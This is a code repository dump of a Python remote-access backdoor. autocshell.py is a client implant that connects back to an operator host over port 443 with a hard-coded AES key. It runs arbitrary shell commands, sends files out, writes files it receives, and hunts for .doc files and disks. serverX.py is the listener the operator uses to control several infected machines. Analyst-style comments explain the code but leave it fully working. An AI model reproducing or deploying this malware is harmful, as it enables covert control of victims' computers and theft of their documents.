├── .gitattributes ├── .gitignore ├── README.md ├── autocshell.py ├── miansha.JPG ├── server.png └── serverX.py /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto 3 | 4 | # Custom for Visual Studio 5 | *.cs diff=csharp 6 | 7 | # Standard to msysgit 8 | *.doc diff=astextplain 9 | *.DOC diff=astextplain 10 | *.docx diff=astextplain 11 | *.DOCX diff=astextplain 12 | *.dot diff=astextplain 13 | *.DOT diff=astextplain 14 | *.pdf diff=astextplain 15 | *.PDF diff=astextplain 16 | *.rtf diff=astextplain 17 | *.RTF diff=astextplain 18 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | 5 | # C extensions 6 | *.so 7 | 8 | # Distribution / packaging 9 | .Python 10 | env/ 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | lib/ 17 | lib64/ 18 | parts/ 19 | sdist/ 20 | var/ 21 | *.egg-info/ 22 | .installed.cfg 23 | *.egg 24 | 25 | # PyInstaller 26 | # Usually these files are written by a python script from a template 27 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
28 | *.manifest 29 | *.spec 30 | 31 | # Installer logs 32 | pip-log.txt 33 | pip-delete-this-directory.txt 34 | 35 | # Unit test / coverage reports 36 | htmlcov/ 37 | .tox/ 38 | .coverage 39 | .cache 40 | nosetests.xml 41 | coverage.xml 42 | 43 | # Translations 44 | *.mo 45 | *.pot 46 | 47 | # Django stuff: 48 | *.log 49 | 50 | # Sphinx documentation 51 | docs/_build/ 52 | 53 | # PyBuilder 54 | target/ 55 | 56 | # ========================= 57 | # Operating System Files 58 | # ========================= 59 | 60 | # OSX 61 | # ========================= 62 | 63 | .DS_Store 64 | .AppleDouble 65 | .LSOverride 66 | 67 | # Thumbnails 68 | ._* 69 | 70 | # Files that might appear on external disk 71 | .Spotlight-V100 72 | .Trashes 73 | 74 | # Directories potentially created on remote AFP share 75 | .AppleDB 76 | .AppleDesktop 77 | Network Trash Folder 78 | Temporary Items 79 | .apdisk 80 | 81 | # Windows 82 | # ========================= 83 | 84 | # Windows image file caches 85 | Thumbs.db 86 | ehthumbs.db 87 | 88 | # Folder config file 89 | Desktop.ini 90 | 91 | # Recycle Bin used on file shares 92 | $RECYCLE.BIN/ 93 | 94 | # Windows Installer files 95 | *.cab 96 | *.msi 97 | *.msm 98 | *.msp 99 | 100 | # Windows shortcuts 101 | *.lnk 102 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/README.md -------------------------------------------------------------------------------- /autocshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from Crypto.Cipher import AES 4 | import subprocess, socket, base64, time, os, sys 5 | import fnmatch 6 | import wmi 7 | # the block size for the cipher object; must be 16, 24, or 32 for AES 8 | BLOCK_SIZE = 32 9 | 10 | # one-liners to encrypt/encode and 
# decrypt/decode a string
#
# Analyst summary of this part of autocshell.py (the client/implant side):
#   * Python 2 code (it calls unicode() below).
#   * Every message is AES-encrypted and then base64-encoded before it is
#     written to the socket, so the bytes on the wire are base64 text.
#   * The plaintext of each message ends with the marker "EOFEOFEOFEOFEOFX";
#     the marker is inside the encrypted payload, not visible on the wire.

# EncodeAES: encrypt with the cipher object c, then base64-encode the result.
# DecodeAES: base64-decode e, then decrypt with the cipher object c.
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# Hard-coded key. The original comment said "generate a random secret key",
# but this is a fixed 32-character literal, and serverX.py on this page carries
# the identical string. Anyone who holds the sample therefore holds the key,
# and the literal itself is a usable static signature for this build.
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"

# server config
# 'xx.xx.xx.xx' is presumably a placeholder left by the author; the port is 443.
HOST = 'xx.xx.xx.xx'
PORT = 443

# session controller: set to True once the server sends 'Activate'
active = False

# Functions
###########

# Send one message: append the end marker to cmd, encrypt + base64 it with the
# module-level `cipher` (created in the main loop), and write it to sock.
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# Receive one message: read up to 1024 bytes at a time, decode/decrypt each
# chunk on its own, and accumulate the plaintext until it ends with the marker
# or recv() returns an empty string (peer closed the connection).
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data = data + decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    # The last len(end) characters are dropped whether or not the marker was seen.
    return data[:-len(end)]

# "Upload" from the client's point of view: read a local file and send its
# contents to the server (the operator's "download" command ends up here).
def Upload(sock, filename):

    filename = unicode(filename , "utf8")
    bgtr = True  # assigned but never read in this function
    # file transfer
    try:

        f = open(filename, 'rb')
        while 1:
            # f.read() with no size returns the whole file in one call
            fileData = f.read()
            if fileData == '': break
            # sent with an empty end marker, so no terminator follows the data
            Send(sock, fileData, "")
        f.close()
    except:
        # Bare except: any failure (missing file, access denied, socket error)
        # is swallowed and the completion message below is still returned.
        time.sleep(0.1)
    # Signal completion: a message whose plaintext is only the end marker,
    # bracketed by fixed 0.8 s pauses.
    time.sleep(0.8)
    Send(sock, "")
    time.sleep(0.8)
    return "Finished download."

# "Download" from the client's point of view: receive one message from the
# server and write it to a local file (the operator's "upload" command).
def Download(sock, filename):
    # Opened with 'wb', so an existing file of that name is truncated.
    # NOTE(review): the caller on this page passes the text after "upload "
    # from the network unchanged, so the write location is chosen remotely.
    g = open(filename, 'wb')
    # the whole file arrives as a single Receive() result
    fileData = Receive(sock)
    time.sleep(0.8)
    g.write(fileData)
    g.close()
    # status string that the main loop sends back to the server
    return "Finished upload."
# Recursively walk `path` and yield the full path of every file whose name
# matches the fnmatch pattern `fnexp`.
def iterfindfiles(path, fnexp):
    for root, dirs, files in os.walk(path):
        for filename in fnmatch.filter(files, fnexp):
            yield os.path.join(root, filename)
# Collect the paths of all "*.doc" files under `path` into a staging file.
# Host artifact: a file named by concatenating path + 'myfind.txt' (no path
# separator is inserted), opened in append mode; entries are written without
# any delimiter between them.
def autofind(path):
    for filename in iterfindfiles(path, "*.doc"):
        f = open(path+'myfind.txt','a')
        f.write(filename)
        f.close()
# Enumerate logical disks through WMI and record their captions.
# Win32_LogicalDisk with DriveType=3 selects local fixed disks.
# Host artifact: path + 'disk.txt', append mode, no delimiter between entries.
def Checkdisk(path):

    c = wmi.WMI ()
    for disk in c.Win32_LogicalDisk (DriveType=3):
        f = open(path+'disk.txt','a')
        f.write(disk.Caption)
        f.close()

# main loop
# Analyst summary: the client dials out to HOST:PORT over a plain TCP socket,
# waits for the server's 'Activate' message, then executes whatever the server
# sends until told to quit. Observable behaviour:
#   * outbound TCP to port 443 carrying base64 text rather than a TLS handshake;
#   * a new connection attempt 3 s after a session ends, or 10 s after a
#     socket error, repeating until a "terminate" command is received;
#   * a shell child process for every command that is not one of the built-in
#     keywords (subprocess.Popen with shell=True).
while True:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))

        # New cipher object per connection, built from the hard-coded key.
        # No IV argument is supplied; which IV the library then uses is not
        # visible on this page.
        cipher = AES.new(secret,AES.MODE_CFB)

        # waiting to be activated...
        data = Receive(s)

        # On activation, reply with a prompt made of the current directory.
        if data == 'Activate':
            active = True
            Send(s, "\n"+os.getcwd()+">")

        # interactive loop
        while active:

            # Receive data
            data = Receive(s)

            # "quit" ends this session only; "terminate" also ends the
            # process (checked again after the loop).
            if data == "quit" or data == "terminate":
                Send(s, "quitted")
                break

            # change the client's working directory
            elif data.startswith("cd ") == True:
                os.chdir(data[3:])
                stdoutput = ""

            # operator "download" == client sends a local file to the server
            elif data.startswith("download ") == True:
                # Upload the file
                stdoutput = Upload(s, data[9:])

            # operator "upload" == client writes a file received from the server
            elif data.startswith("upload ") == True:
                # Download the file
                stdoutput = Download(s, data[7:])
            # built-in: index *.doc files under the given path (see autofind)
            elif data.startswith("autofind") ==True:
                autofind(data[9:])
                stdoutput = ""
            # built-in: list fixed disks via WMI (see Checkdisk)
            elif data.startswith("checkdisk") ==True:

                Checkdisk(data[10:])
                stdoutput = ""
            else:
                # Anything else is handed to the system shell unchanged.
                proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

                # stdout is read to EOF first, then stderr
                stdoutput = proc.stdout.read() + proc.stderr.read()

            # Append a fresh prompt and send the result back.
            stdoutput = stdoutput+"\n"+os.getcwd()+">"
            # Output is decoded as GBK before being re-encoded as UTF-8;
            # presumably the author expected a GBK console code page.
            stdoutput = stdoutput.decode('gbk').encode('utf-8')
            Send(s, stdoutput)

        # loop ends here

        if data == "terminate":
            break
        time.sleep(3)
    except socket.error:
        # connection failed or dropped: close and retry after 10 seconds
        s.close()
        time.sleep(10)
        continue

--------------------------------------------------------------------------------
/miansha.JPG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/miansha.JPG

--------------------------------------------------------------------------------
/server.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/az0ne/python_backdoor/5782246f4f83cfe194db61b3d2c2121acc66e535/server.png

--------------------------------------------------------------------------------
/serverX.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

# Analyst summary: this is the operator-side listener that pairs with
# autocshell.py. It is Python 2 code (print statements, raw_input) and uses
# the same message framing and the same hard-coded key as the client.

from Crypto.Cipher import AES
import socket, base64, os, time, sys, select

# the block size for the cipher object; must be 16, 24, or 32 for AES
BLOCK_SIZE = 32

# EncodeAES: encrypt with the cipher object c, then base64-encode the result.
# DecodeAES: base64-decode e, then decrypt with the cipher object c.
EncodeAES = lambda c, s: base64.b64encode(c.encrypt(s))
DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e))

# Hard-coded key (the original comment said "generate a random secret key");
# it is the same literal that autocshell.py uses.
secret = "HUISA78sa9y&9syYSsJhsjkdjklfs9aR"

# clear function
##################################
# Windows ---------------> cls
# Linux ---------------> clear
clear = lambda: os.system('clear')

# Listening socket: all interfaces, TCP port 443, backlog of 128.
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.bind(('0.0.0.0', 443))
c.listen(128)

# client information
active = False
# clients holds str(address) per connection; the parallel list of sockets
# is defined on the next line of the file
clients = []
# accepted client sockets, index-aligned with the `clients` address list
socks = []
# fixed pause (seconds) used between transfer steps and after accepting
interval = 0.8

# Functions
###########

# Send one message: append the end marker to cmd, encrypt + base64 it with the
# module-level `cipher` (created when a client is activated), write it to sock.
def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
    sock.sendall(EncodeAES(cipher, cmd + end))

# Receive one message: read up to 1024 bytes at a time, decode/decrypt each
# chunk on its own, and accumulate the plaintext until it ends with the marker
# or recv() returns an empty string.
def Receive(sock, end="EOFEOFEOFEOFEOFX"):
    data = ""
    l = sock.recv(1024)
    while(l):
        decrypted = DecodeAES(cipher, l)
        data += decrypted
        if data.endswith(end) == True:
            break
        else:
            l = sock.recv(1024)
    # The last len(end) characters are dropped whether or not the marker was seen.
    return data[:-len(end)]

# Pull a file from the client and store it on the operator's machine.
# local_filename defaults to remote_filename when it is not given.
def download(sock, remote_filename, local_filename=None):
    if not local_filename:
        local_filename = remote_filename
    try:
        f = open(local_filename, 'wb')
    except IOError:
        print "Error opening file.\n"
        # "cd ." is sent so the client still replies with a prompt
        Send(sock, "cd .")
        return
    # start transfer: the client answers "download <name>" with the file bytes
    Send(sock, "download "+remote_filename)
    print "Downloading: " + remote_filename + " > " + local_filename
    time.sleep(interval)
    fileData = Receive(sock)
    print "> File size: " + str(len(fileData))
    time.sleep(interval)
    f.write(fileData)
    time.sleep(interval)
    f.close()

# Push a local file to the client.
# remote_filename defaults to local_filename when it is not given.
def upload(sock, local_filename, remote_filename=None):
    if not remote_filename:
        remote_filename = local_filename
    try:
        g = open(local_filename, 'rb')
    except IOError:
        print "Error opening file.\n"
        # "cd ." is sent so the client still replies with a prompt
        Send(sock, "cd .")
        return
    # start transfer: announce the target name, then stream the contents
    Send(sock, "upload "+remote_filename)
    print 'Uploading: ' + local_filename + " > " + remote_filename
    while True:
        # g.read() with no size returns the whole file in one call
        fileData = g.read()
        if not fileData: break
        # sent with an empty end marker; the terminator follows separately
        Send(sock, fileData, "")
        print "File size: " + str(len(fileData))
    g.close()
    time.sleep(interval)
    # a message containing only the end marker tells the client the file is done
    Send(sock, "")
    time.sleep(interval)

# Redraw the console menu: one numbered entry per connected client address,
# plus the exit option.
def refresh():
    clear()
    print '\nListening for clients...\n'
    if len(clients) > 0:
        for j in range(0,len(clients)):
            print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
    else:
        print "...\n"
    # print exit option
    print "---\n"
    print "[0] Exit \n"
    print "\nPress Ctrl+C to interact with client."


# main loop
# Accepts connections in 10-second windows and keeps every client socket open
# until the operator presses Ctrl+C and picks one to interact with.
while True:
    refresh()
    # listen for clients
    try:
        # set timeout
        c.settimeout(10)

        # accept connection
        try:
            s,a = c.accept()
        except socket.timeout:
            continue

        # register the new client; its socket is switched back to blocking mode
        if (s):
            s.settimeout(None)
            socks += [s]
            clients += [str(a)]

        # display clients
        refresh()

        # sleep
        time.sleep(interval)

    except KeyboardInterrupt:

        # display clients
        refresh()

        # accept selection --- int, 0/1-128
        # NOTE(review): Python 2 input() evaluates the typed text as an
        # expression; non-integer or out-of-range entries are not handled here.
        activate = input("\nEnter option: ")

        # exit: close every client socket and stop the server
        if activate == 0:
            print '\nExiting...\n'
            for j in range(0,len(socks)):
                socks[j].close()
            sys.exit()

        # subtract 1 (array starts at 0)
        activate -= 1

        # clear screen
        clear()

        # New cipher object per activation, built from the hard-coded key.
        # No IV argument is supplied; which IV the library then uses is not
        # visible on this page.
        cipher = AES.new(secret,AES.MODE_CFB)
        print '\nActivating client: ' + clients[activate] + '\n'
        active = True
        Send(socks[activate], 'Activate')

    # interact with client
    while active:
        try:
            # receive data from client
            data = Receive(socks[activate])
        # Any exception while receiving is treated as a disconnect.
        except:
            print '\nClient disconnected... ' + clients[activate]
            # drop the client from both parallel lists
            socks[activate].close()
            time.sleep(0.8)
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            refresh()
            active = False
            break

        # 'quitted' is the client's acknowledgement of quit/terminate
        if data == 'quitted':
            # print message
            print "Exit.\n"
            # remove from arrays
            socks[activate].close()
            socks.remove(socks[activate])
            clients.remove(clients[activate])
            # sleep and refresh
            time.sleep(0.8)
            refresh()
            active = False
            break
        # Non-empty data is the client's output plus its prompt.
        elif data != '':
            # show it and read the operator's next command
            sys.stdout.write(data)
            nextcmd = raw_input()

            # download <remote> [<local>]
            if nextcmd.startswith("download ") == True:
                if len(nextcmd.split(' ')) > 2:
                    download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
                else:
                    download(socks[activate], nextcmd.split(' ')[1])

            # upload <local> [<remote>]
            elif nextcmd.startswith("upload ") == True:
                if len(nextcmd.split(' ')) > 2:
                    upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
                else:
                    upload(socks[activate], nextcmd.split(' ')[1])

            # anything else is forwarded to the client as-is
            elif nextcmd != '':
                Send(socks[activate], nextcmd)

--------------------------------------------------------------------------------